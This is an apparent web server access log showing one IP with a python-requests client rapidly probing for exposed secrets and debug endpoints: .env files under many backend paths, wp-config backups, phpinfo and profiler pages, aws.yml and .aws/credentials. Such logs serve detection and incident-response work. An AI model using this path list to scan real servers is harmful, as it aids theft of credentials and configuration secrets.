103.153.182.150 - - [11/Oct/2025:14:12:16 +0800] "GET /backend/cronlab/.env HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:17 +0800] "GET /backend/cron/.env HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:18 +0800] "GET /backend/core/app/.env HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:19 +0800] "GET /backend/core/Database/.env HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:20 +0800] "GET /backend/sitemaps/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:21 +0800] "GET /backend/en/.env HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:22 +0800] "GET /backend/v1/.env HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:23 +0800] "GET /backend/administrator/.env HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:24 +0800] "GET /backend/laravel/.env HTTP/1.1" 404 8991 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:25 +0800] "GET /_profiler/phpinfo HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:26 +0800] "GET /tool/view/phpinfo.view.php HTTP/1.1" 404 47 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:27 +0800] "GET /wp-config.php-backup HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:28 +0800] "GET /%C0 HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:29 +0800] "GET /debug/default/view.html HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:30 +0800] "GET /debug/default/view HTTP/1.1" 404 8989 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:31 +0800] "GET /frontend/web/debug/default/view HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:32 +0800] "GET /symfony/public/_profiler/phpinfo HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:33 +0800] "GET /debug/default/view?panel=config HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:34 +0800] "GET /phpinfo.php HTTP/1.1" 404 47 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:35 +0800] "GET /phpinfo HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:36 +0800] "GET /aws.yml HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:37 +0800] "GET /.env.bak HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:37 +0800] "GET /info.php HTTP/1.1" 200 49 "-" "python-requests/2.32.5"
103.153.182.150 - - [11/Oct/2025:14:12:38 +0800] "GET /.aws/credentials HTTP/1.1" 404 8990 "-" "python-requests/2.32.5"
